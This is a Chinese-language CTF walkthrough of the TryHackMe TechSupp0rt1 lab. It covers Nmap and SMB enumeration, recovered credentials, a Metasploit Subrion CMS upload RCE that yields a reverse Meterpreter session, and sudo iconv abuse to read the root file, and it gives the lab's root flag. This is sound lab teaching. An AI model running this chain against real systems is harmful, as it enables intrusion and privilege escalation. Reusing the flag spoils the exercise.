TryHackMe TechSupp0rt1 渗透测试完整指南:从SMB枚举到Root提权

本文详细记录了TryHackMe平台TechSupp0rt1靶机的完整渗透过程,涵盖Nmap扫描、SMB共享枚举、Subrion CMS文件上传漏洞利用、WordPress凭证提取,以及通过iconv提权获取root权限的全流程技术细节。

TryHackMe — TechSupp0rt1 渗透测试完整指南

初始侦察

首先使用激进式Nmap扫描识别开放服务和版本信息:

1
nmap -sV -sC -sS -Pn 10.201.64.113

关键发现:

  • 22/tcp — OpenSSH 7.2p2(SSH访问)
  • 80/tcp — Apache httpd 2.4.18(Web服务器)
  • 139/tcp & 445/tcp — Samba共享服务(smbd 3.x/4.x)
  • 主机名:TECHSUPPORT,操作系统:Ubuntu

SMB枚举

列出可用共享:

1
smbclient -L 10.201.64.113

发现websvr共享后挂载并获取enter.txt文件:

1
2
smbclient //10.201.64.113/websvr
smb: \> get enter.txt

凭证解密

enter.txt内容包含Subrion管理员凭证:

1
admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk

使用CyberChef解码后获得密码:Scam2021

Web枚举

使用Dirsearch扫描Web目录:

1
dirsearch -u http://10.201.64.113

确认Subrion后台路径:/subrion/panel/

漏洞利用

发现Subrion CMS v4.2.1存在文件上传RCE漏洞,使用Metasploit模块:

1
2
3
4
5
6
7
msfconsole
use exploit/multi/http/subrion_cms_file_upload_rce
set targeturi subrion/
set password Scam2021
set RHOSTS <target ip>
set LHOST <your ip>
run

成功获取Meterpreter会话。

权限提升

  1. 从WordPress配置文件获取数据库凭证:
1
2
DB_USER: support
DB_PASSWORD: ImAScammerLOL!123!
  1. 升级到scamsite用户shell:
1
2
3
python3 -c 'import pty;pty.spawn("/bin/bash")'
su scamsite
Password: ImAScammerLOL!123!
  1. 利用sudo权限提权:
1
2
3
4
sudo -l
# 显示scamsite可无密码运行/usr/bin/iconv
LFILE=/root/root.txt
sudo /usr/bin/iconv -f 8859_1 -t 8859_1 "$LFILE"

成功获取root标志:851b8233a8c09400ec30651bd1529bf1ed02790b

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计